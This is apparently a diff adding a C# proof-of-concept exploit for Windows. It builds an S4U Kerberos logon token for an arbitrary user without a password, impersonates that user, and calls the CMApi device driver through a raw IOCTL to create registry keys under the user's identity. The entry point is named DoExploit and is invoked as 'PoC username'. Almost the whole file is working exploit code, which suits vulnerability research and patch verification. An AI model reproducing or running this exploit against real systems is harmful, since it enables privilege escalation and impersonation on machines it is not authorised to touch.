[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] + public byte[] SourceName; + public UInt64 SourceIdentifier; + } + + [StructLayout(LayoutKind.Sequential)] + public struct QUOTA_LIMITS + { + UInt32 PagedPoolLimit; + UInt32 NonPagedPoolLimit; + UInt32 MinimumWorkingSetSize; + UInt32 MaximumWorkingSetSize; + UInt32 PagefileLimit; + Int64 TimeLimit; + } + + [StructLayout(LayoutKind.Sequential)] + public struct LSA_STRING + { + public UInt16 Length; + public UInt16 MaximumLength; + public /*PCHAR*/ IntPtr Buffer; + } + + public class LsaStringWrapper : IDisposable + { + public LSA_STRING _string; + + public LsaStringWrapper(string value) + { + _string = new LSA_STRING(); + _string.Length = (ushort)value.Length; + _string.MaximumLength = (ushort)value.Length; + _string.Buffer = Marshal.StringToHGlobalAnsi(value); + } + + ~LsaStringWrapper() + { + Dispose(false); + } + + private void Dispose(bool disposing) + { + if (_string.Buffer != IntPtr.Zero) + { + Marshal.FreeHGlobal(_string.Buffer); + _string.Buffer = IntPtr.Zero; + } + if (disposing) + GC.SuppressFinalize(this); + } + + #region IDisposable Members + + public void Dispose() + { + Dispose(true); + } + + #endregion + } + + public class KerbS4ULogon : IDisposable + { + [StructLayout(LayoutKind.Sequential)] + public struct KERB_S4U_LOGON + { + public Int32 MessageType; // Should be 12 + public Int32 Flags; // Reserved, should be 0 + public LSA_UNICODE_STRING ClientUpn; // REQUIRED: UPN for client + public LSA_UNICODE_STRING ClientRealm; // Optional: Client Realm, if known + } + + public KerbS4ULogon(string clientUpn) : this(clientUpn, null) + { + } + + public KerbS4ULogon(string clientUpn, string clientRealm) + { + int clientUpnLen = (clientUpn == null) ? 0 : clientUpn.Length; + int clientRealmLen = (clientRealm == null) ? 0 : clientRealm.Length; + _bufferLength = Marshal.SizeOf(typeof(KERB_S4U_LOGON)) + 2 * (clientUpnLen + clientRealmLen); + _bufferContent = Marshal.AllocHGlobal(_bufferLength); + if (_bufferContent == IntPtr.Zero) + throw new OutOfMemoryException("Could not allocate memory for KerbS4ULogon structure"); + try + { + KERB_S4U_LOGON baseStructure = new KERB_S4U_LOGON(); + baseStructure.MessageType = 12; // KerbS4ULogon + baseStructure.Flags = 0; + baseStructure.ClientUpn.Length = (UInt16)(2 * clientUpnLen); + baseStructure.ClientUpn.MaximumLength = (UInt16)(2 * clientUpnLen); + IntPtr curPtr = new IntPtr(_bufferContent.ToInt64() + Marshal.SizeOf(typeof(KERB_S4U_LOGON))); + + if (clientUpnLen > 0) + { + baseStructure.ClientUpn.Buffer = curPtr; + Marshal.Copy(clientUpn.ToCharArray(), 0, curPtr, clientUpnLen); + curPtr = new IntPtr(curPtr.ToInt64() + clientUpnLen * 2); + } + else + baseStructure.ClientUpn.Buffer = IntPtr.Zero; + baseStructure.ClientRealm.Length = (UInt16)(2 * clientRealmLen); + baseStructure.ClientRealm.MaximumLength = (UInt16)(2 * clientRealmLen); + if (clientRealmLen > 0) + { + baseStructure.ClientRealm.Buffer = curPtr; + Marshal.Copy(clientRealm.ToCharArray(), 0, curPtr, clientRealmLen); + } + else + baseStructure.ClientRealm.Buffer = IntPtr.Zero; + Marshal.StructureToPtr(baseStructure, _bufferContent, false); + } + catch + { + Dispose(true); + throw; + } + } + + private IntPtr _bufferContent; + private int _bufferLength; + + public IntPtr Ptr + { + get { return _bufferContent; } + } + + public int Length + { + get { return _bufferLength; } + } + + private void Dispose(bool disposing) + { + if (_bufferContent != IntPtr.Zero) + { + Marshal.FreeHGlobal(_bufferContent); + _bufferContent = IntPtr.Zero; + } + if (disposing) + GC.SuppressFinalize(this); + } + + ~KerbS4ULogon() + { + Dispose(false); + } + + #region IDisposable Members + + public void Dispose() + { + Dispose(true); + } + + #endregion + } + + [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = false)] + public static extern WinErrors LsaNtStatusToWinError(WinStatusCodes status); + + [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] + public static extern bool AllocateLocallyUniqueId([Out] out UInt64 Luid); + + [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] + public static extern int CloseHandle(IntPtr hObject); + + [DllImport("secur32.dll", SetLastError = false)] + public static extern WinStatusCodes LsaLogonUser( + [In] IntPtr LsaHandle, + [In] ref LSA_STRING OriginName, + [In] SecurityLogonType LogonType, + [In] UInt32 AuthenticationPackage, + [In] IntPtr AuthenticationInformation, + [In] UInt32 AuthenticationInformationLength, + [In] /*PTOKEN_GROUPS*/ IntPtr LocalGroups, + [In] ref TOKEN_SOURCE SourceContext, + [Out] /*PVOID*/ out IntPtr ProfileBuffer, + [Out] out UInt32 ProfileBufferLength, + [Out] out Int64 LogonId, + [Out] out IntPtr Token, + [Out] out QUOTA_LIMITS Quotas, + [Out] out WinStatusCodes SubStatus + ); + + [DllImport("secur32.dll", SetLastError = false)] + public static extern WinStatusCodes LsaFreeReturnBuffer( + [In] IntPtr buffer); + + [DllImport("secur32.dll", SetLastError = false)] + public static extern WinStatusCodes LsaConnectUntrusted([Out] out IntPtr LsaHandle); + + [DllImport("secur32.dll", SetLastError = false)] + public static extern WinStatusCodes LsaDeregisterLogonProcess([In] IntPtr LsaHandle); + + [DllImport("secur32.dll", SetLastError = false)] + public static extern WinStatusCodes LsaLookupAuthenticationPackage([In] IntPtr LsaHandle, [In] ref LSA_STRING PackageName, [Out] out UInt32 AuthenticationPackage); + + } + + public sealed class HandleSecurityToken + : IDisposable + { + private IntPtr m_hToken = IntPtr.Zero; + + // using S4U logon + public HandleSecurityToken(string UserName, + string Domain, + OSCalls.WinLogonType LogonType + ) + { + using (OSCalls.KerbS4ULogon authPackage = new OSCalls.KerbS4ULogon(UserName, Domain)) + { + IntPtr lsaHandle; + OSCalls.WinStatusCodes status = OSCalls.LsaConnectUntrusted(out lsaHandle); + if (status != OSCalls.WinStatusCodes.STATUS_SUCCESS) + throw new System.ComponentModel.Win32Exception((int)OSCalls.LsaNtStatusToWinError(status)); + try + { + UInt32 kerberosPackageId; + using (OSCalls.LsaStringWrapper kerberosPackageName = new OSCalls.LsaStringWrapper("Negotiate")) + { + status = OSCalls.LsaLookupAuthenticationPackage(lsaHandle, ref kerberosPackageName._string, out kerberosPackageId); + if (status != OSCalls.WinStatusCodes.STATUS_SUCCESS) + throw new System.ComponentModel.Win32Exception((int)OSCalls.LsaNtStatusToWinError(status)); + } + OSCalls.LsaStringWrapper originName = null; + try + { + originName = new OSCalls.LsaStringWrapper("S4U"); + OSCalls.TOKEN_SOURCE sourceContext = new OSCalls.TOKEN_SOURCE("NtLmSsp"); + System.IntPtr profileBuffer = IntPtr.Zero; + UInt32 profileBufferLength = 0; + Int64 logonId; + OSCalls.WinStatusCodes subStatus; + OSCalls.QUOTA_LIMITS quotas; + status = OSCalls.LsaLogonUser( + lsaHandle, + ref originName._string, + (OSCalls.SecurityLogonType)LogonType, + kerberosPackageId, + authPackage.Ptr, + (uint)authPackage.Length, + IntPtr.Zero, + ref sourceContext, + out profileBuffer, + out profileBufferLength, + out logonId, + out m_hToken, + out quotas, + out subStatus); + if (status != OSCalls.WinStatusCodes.STATUS_SUCCESS) + throw new System.ComponentModel.Win32Exception((int)OSCalls.LsaNtStatusToWinError(status)); + if (profileBuffer != IntPtr.Zero) + OSCalls.LsaFreeReturnBuffer(profileBuffer); + } + finally + { + if (originName != null) + originName.Dispose(); + } + } + finally + { + OSCalls.LsaDeregisterLogonProcess(lsaHandle); + } + } + } + + ~HandleSecurityToken() + { + Dispose(false); + } + + public void Dispose() + { + Dispose(true); + } + + private void Dispose(bool disposing) + { + lock (this) + { + if (!m_hToken.Equals(IntPtr.Zero)) + { + OSCalls.CloseHandle(m_hToken); + m_hToken = IntPtr.Zero; + } + if (disposing) + GC.SuppressFinalize(this); + } + } + + public System.Security.Principal.WindowsIdentity BuildIdentity() + { + System.Security.Principal.WindowsIdentity retVal = new System.Security.Principal.WindowsIdentity(m_hToken); + GC.KeepAlive(this); + return retVal; + } + } + + } + + #endregion + + /// + /// The Windows Logon Types. + /// + public enum WinLogonType + { + /// + /// Interactive logon + /// + LOGON32_LOGON_INTERACTIVE = Win32.OSCalls.WinLogonType.LOGON32_LOGON_INTERACTIVE, + /// + /// Network logon + /// + LOGON32_LOGON_NETWORK = Win32.OSCalls.WinLogonType.LOGON32_LOGON_NETWORK, + /// + /// Batch logon + /// + LOGON32_LOGON_BATCH = Win32.OSCalls.WinLogonType.LOGON32_LOGON_BATCH, + /// + /// Logon as a service + /// + LOGON32_LOGON_SERVICE = Win32.OSCalls.WinLogonType.LOGON32_LOGON_SERVICE, + /// + /// Unlock logon + /// + LOGON32_LOGON_UNLOCK = Win32.OSCalls.WinLogonType.LOGON32_LOGON_UNLOCK, + /// + /// Preserve password logon + /// + LOGON32_LOGON_NETWORK_CLEARTEXT = Win32.OSCalls.WinLogonType.LOGON32_LOGON_NETWORK_CLEARTEXT, + /// + /// Current token for local access, credentials for network access + /// + LOGON32_LOGON_NEW_CREDENTIALS = Win32.OSCalls.WinLogonType.LOGON32_LOGON_NEW_CREDENTIALS + } + + /// + /// Logs in a credential for server apps. No need to provide password. + /// + /// The credential to log in. Password is ignored. + /// The type of logon to use + /// + /// Requires Windows Server 2003 domain account running in Win2003 native domain mode + /// + /// Returns a System.Security.Principal.WindowsIdentity object + /// Raises an exception with error information if the user cannot log in + public static System.Security.Principal.WindowsIdentity CreateIdentityS4U(System.Net.NetworkCredential credential, WinLogonType logonType) + { + using (Win32.HandleSecurityToken handleToken = + new Win32.HandleSecurityToken(credential.UserName, credential.Domain, (Win32.OSCalls.WinLogonType)logonType)) + return handleToken.BuildIdentity(); + } + + + class Program + { + [Flags] + public enum AttributeFlags : uint + { + None = 0, + Inherit = 0x00000002, + Permanent = 0x00000010, + Exclusive = 0x00000020, + CaseInsensitive = 0x00000040, + OpenIf = 0x00000080, + OpenLink = 0x00000100, + KernelHandle = 0x00000200, + ForceAccessCheck = 0x00000400, + IgnoreImpersonatedDevicemap = 0x00000800, + DontReparse = 0x00001000, + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public sealed class UnicodeString + { + ushort Length; + ushort MaximumLength; + [MarshalAs(UnmanagedType.LPWStr)] + string Buffer; + + public UnicodeString(string str) + { + Length = (ushort)(str.Length * 2); + MaximumLength = (ushort)((str.Length * 2) + 1); + Buffer = str; + } + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public sealed class ObjectAttributes : IDisposable + { + int Length; + IntPtr RootDirectory; + IntPtr ObjectName; + AttributeFlags Attributes; + IntPtr SecurityDescriptor; + IntPtr SecurityQualityOfService; + + private static IntPtr AllocStruct(object s) + { + int size = Marshal.SizeOf(s); + IntPtr ret = Marshal.AllocHGlobal(size); + Marshal.StructureToPtr(s, ret, false); + return ret; + } + + private static void FreeStruct(ref IntPtr p, Type struct_type) + { + Marshal.DestroyStructure(p, struct_type); + Marshal.FreeHGlobal(p); + p = IntPtr.Zero; + } + + public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr rootkey) + { + Length = Marshal.SizeOf(this); + if (object_name != null) + { + ObjectName = AllocStruct(new UnicodeString(object_name)); + } + Attributes = flags; + RootDirectory = rootkey; + } + + public ObjectAttributes(string object_name, AttributeFlags flags) + : this(object_name, flags, IntPtr.Zero) + { + } + + public void Dispose() + { + if (ObjectName != IntPtr.Zero) + { + FreeStruct(ref ObjectName, typeof(UnicodeString)); + } + GC.SuppressFinalize(this); + } + + ~ObjectAttributes() + { + Dispose(); + } + } + + [Flags] + public enum LoadKeyFlags + { + None = 0, + AppKey = 0x10, + Exclusive = 0x20, + Unknown800 = 0x800, + ReadOnly = 0x2000, + } + + [Flags] + public enum GenericAccessRights : uint + { + None = 0, + GenericRead = 0x80000000, + GenericWrite = 0x40000000, + GenericExecute = 0x20000000, + GenericAll = 0x10000000, + Delete = 0x00010000, + ReadControl = 0x00020000, + WriteDac = 0x00040000, + WriteOwner = 0x00080000, + Synchronize = 0x00100000, + MaximumAllowed = 0x02000000, + } + + public class NtException : ExternalException + { + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern IntPtr GetModuleHandle(string modulename); + + [Flags] + enum FormatFlags + { + AllocateBuffer = 0x00000100, + FromHModule = 0x00000800, + FromSystem = 0x00001000, + IgnoreInserts = 0x00000200 + } + + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern int FormatMessage( + FormatFlags dwFlags, + IntPtr lpSource, + int dwMessageId, + int dwLanguageId, + out IntPtr lpBuffer, + int nSize, + IntPtr Arguments + ); + + [DllImport("kernel32.dll")] + private static extern IntPtr LocalFree(IntPtr p); + + private static string StatusToString(int status) + { + IntPtr buffer = IntPtr.Zero; + try + { + if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts, + GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0) + { + return Marshal.PtrToStringUni(buffer); + } + } + finally + { + if (buffer != IntPtr.Zero) + { + LocalFree(buffer); + } + } + return String.Format("Unknown Error: 0x{0:X08}", status); + } + + public NtException(int status) : base(StatusToString(status)) + { + } + } + + public static void StatusToNtException(int status) + { + if (status < 0) + { + throw new NtException(status); + } + } + + + [Flags] + public enum FileOpenOptions + { + None = 0, + DirectoryFile = 0x00000001, + WriteThrough = 0x00000002, + SequentialOnly = 0x00000004, + NoIntermediateBuffering = 0x00000008, + SynchronousIoAlert = 0x00000010, + SynchronousIoNonAlert = 0x00000020, + NonDirectoryFile = 0x00000040, + CreateTreeConnection = 0x00000080, + CompleteIfOplocked = 0x00000100, + NoEaKnowledge = 0x00000200, + OpenRemoteInstance = 0x00000400, + RandomAccess = 0x00000800, + DeleteOnClose = 0x00001000, + OpenByFileId = 0x00002000, + OpenForBackupIntent = 0x00004000, + NoCompression = 0x00008000, + OpenRequiringOplock = 0x00010000, + ReserveOpfilter = 0x00100000, + OpenReparsePoint = 0x00200000, + OpenNoRecall = 0x00400000, + OpenForFreeSpaceQuery = 0x00800000 + } + + public class IoStatusBlock + { + public IntPtr Pointer; + public IntPtr Information; + + public IoStatusBlock(IntPtr pointer, IntPtr information) + { + Pointer = pointer; + Information = information; + } + + public IoStatusBlock() + { + } + } + + [Flags] + public enum ShareMode + { + None = 0, + Read = 0x00000001, + Write = 0x00000002, + Delete = 0x00000004, + } + + [Flags] + public enum FileAccessRights : uint + { + None = 0, + ReadData = 0x0001, + WriteData = 0x0002, + AppendData = 0x0004, + ReadEa = 0x0008, + WriteEa = 0x0010, + Execute = 0x0020, + DeleteChild = 0x0040, + ReadAttributes = 0x0080, + WriteAttributes = 0x0100, + GenericRead = 0x80000000, + GenericWrite = 0x40000000, + GenericExecute = 0x20000000, + GenericAll = 0x10000000, + Delete = 0x00010000, + ReadControl = 0x00020000, + WriteDac = 0x00040000, + WriteOwner = 0x00080000, + Synchronize = 0x00100000, + MaximumAllowed = 0x02000000, + } + + [DllImport("ntdll.dll")] + public static extern int NtOpenFile( + out IntPtr FileHandle, + FileAccessRights DesiredAccess, + ObjectAttributes ObjAttr, + [In] [Out] IoStatusBlock IoStatusBlock, + ShareMode ShareAccess, + FileOpenOptions OpenOptions); + + [DllImport("ntdll.dll")] + public static extern int NtDeviceIoControlFile( + SafeFileHandle FileHandle, + IntPtr Event, + IntPtr ApcRoutine, + IntPtr ApcContext, + [In] [Out] IoStatusBlock IoStatusBlock, + uint IoControlCode, + SafeHGlobalBuffer InputBuffer, + int InputBufferLength, + SafeHGlobalBuffer OutputBuffer, + int OutputBufferLength + ); + + static T DeviceIoControl(SafeFileHandle FileHandle, uint IoControlCode, object input_buffer) + { + using (SafeStructureOutBuffer output = new SafeStructureOutBuffer()) + { + using (SafeStructureBuffer input = new SafeStructureBuffer(input_buffer)) + { + IoStatusBlock status = new IoStatusBlock(); + StatusToNtException(NtDeviceIoControlFile(FileHandle, IntPtr.Zero, IntPtr.Zero, + IntPtr.Zero, status, IoControlCode, input, input.Length, + output, output.Length)); + + return output.Result; + } + } + } + + public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit) + { + AttributeFlags flags = AttributeFlags.CaseInsensitive; + if (inherit) + flags |= AttributeFlags.Inherit; + using (ObjectAttributes obja = new ObjectAttributes(name, flags)) + { + IntPtr handle; + IoStatusBlock iostatus = new IoStatusBlock(); + StatusToNtException(NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions)); + return new SafeFileHandle(handle, true); + } + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + class CmApiOpenKeyData + { + public int cbSize; // 0 + public int device_type; // 4 + public int callback_id; // 8 + [MarshalAs(UnmanagedType.LPWStr)] + public string name; // c + public int name_size; // 10 + public GenericAccessRights desired_access; // 14 + public int create; // 18 + public int hardware_id; // 1c + public int return_data_size; // 20 + + public CmApiOpenKeyData(int device_type, int callback_id, string name, GenericAccessRights desired_access, bool create, int hardware_id, int return_data_size) + { + this.cbSize = Marshal.SizeOf(this); + this.device_type = device_type; + this.callback_id = callback_id; + this.name = name; + this.name_size = (name.Length + 1) * 2; + this.desired_access = desired_access; + this.create = create ? 1 : 0; + this.hardware_id = hardware_id; + this.return_data_size = return_data_size; + } + } + + [StructLayout(LayoutKind.Sequential)] + class CmApiOpenKeyResult + { + int size; + public int status; + public long handle; + }; + + public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid + { + public SafeHGlobalBuffer(int length) + : this(Marshal.AllocHGlobal(length), length, true) + { + } + + public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle) + : base(owns_handle) + { + Length = length; + SetHandle(buffer); + } + + public int Length + { + get; private set; + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + Marshal.FreeHGlobal(handle); + handle = IntPtr.Zero; + } + return true; + } + } + + public class SafeStructureBuffer : SafeHGlobalBuffer + { + Type _type; + + public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value)) + { + _type = value.GetType(); + Marshal.StructureToPtr(value, handle, false); + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + Marshal.DestroyStructure(handle, _type); + } + return base.ReleaseHandle(); + } + } + + public class SafeStructureOutBuffer : SafeHGlobalBuffer + { + public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T))) + { + } + + public T Result + { + get + { + if (IsInvalid) + throw new ObjectDisposedException("handle"); + + return Marshal.PtrToStructure(handle); + } + } + } + + static void EnumKeys(RegistryKey rootkey, IEnumerable name_parts, List names, int maxdepth, int current_depth) + { + if (current_depth == maxdepth) + { + names.Add(String.Join(@"\", name_parts)); + } + else + { + foreach (string subkey in rootkey.GetSubKeyNames()) + { + using (RegistryKey key = rootkey.OpenSubKey(subkey)) + { + if (key != null) + { + EnumKeys(key, name_parts.Concat(new string[] { subkey }), names, maxdepth, current_depth + 1); + } + } + } + } + } + + static IEnumerable GetValidDeviceNames() + { + List names = new List(); + using (RegistryKey rootkey = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Enum")) + { + EnumKeys(rootkey, new string[0], names, 3, 0); + } + return names; + } + + static void CreateDeviceKey(string device_name, WindowsIdentity identity) + { + using (SafeFileHandle handle = OpenFile(@"\Device\DeviceApi\CMApi", FileAccessRights.Synchronize | FileAccessRights.GenericRead | FileAccessRights.GenericWrite, + ShareMode.None, FileOpenOptions.NonDirectoryFile | FileOpenOptions.SynchronousIoNonAlert, false)) + { + CmApiOpenKeyData data = new CmApiOpenKeyData(0x111, 1, device_name, GenericAccessRights.MaximumAllowed, true, 0, Marshal.SizeOf(typeof(CmApiOpenKeyResult))); + CmApiOpenKeyResult result = null; + WindowsImpersonationContext ctx = null; + if (identity != null) + { + ctx = identity.Impersonate(); + } + try + { + result = DeviceIoControl(handle, 0x47085B, data); + } + finally + { + if (ctx != null) + { + ctx.Undo(); + } + } + + StatusToNtException(result.status); + } + } + + static bool DoExploit(string username) + { + try + { + WindowsIdentity id = CCWinLogonUtilities.CreateIdentityS4U(new NetworkCredential(username, "", Environment.UserDomainName), + CCWinLogonUtilities.WinLogonType.LOGON32_LOGON_NETWORK); + bool found_hive = false; + foreach (string subkey in Registry.Users.GetSubKeyNames()) + { + string user_name = id.User.ToString(); + if (subkey.Equals(user_name, StringComparison.OrdinalIgnoreCase)) + { + found_hive = true; + break; + } + } + + if (!found_hive) + { + throw new ArgumentException("Couldn't find user hive, make sure the user's logged on"); + } + + string device_name = GetValidDeviceNames().First(); + Console.WriteLine("[SUCCESS]: Found Device: {0}", device_name); + + CreateDeviceKey(device_name, id); + } + catch (Exception ex) + { + Console.WriteLine("[ERROR]: {0}", ex.ToString()); + } + + return false; + } + + static int GetSessionId() + { + using (Process p = Process.GetCurrentProcess()) + { + return p.SessionId; + } + } + + static void Main(string[] args) + { + if (args.Length < 1) + { + Console.WriteLine("Usage: PoC username"); + } + else + { + DoExploit(args[0]); + } + } + } + } +} \ No newline at end of file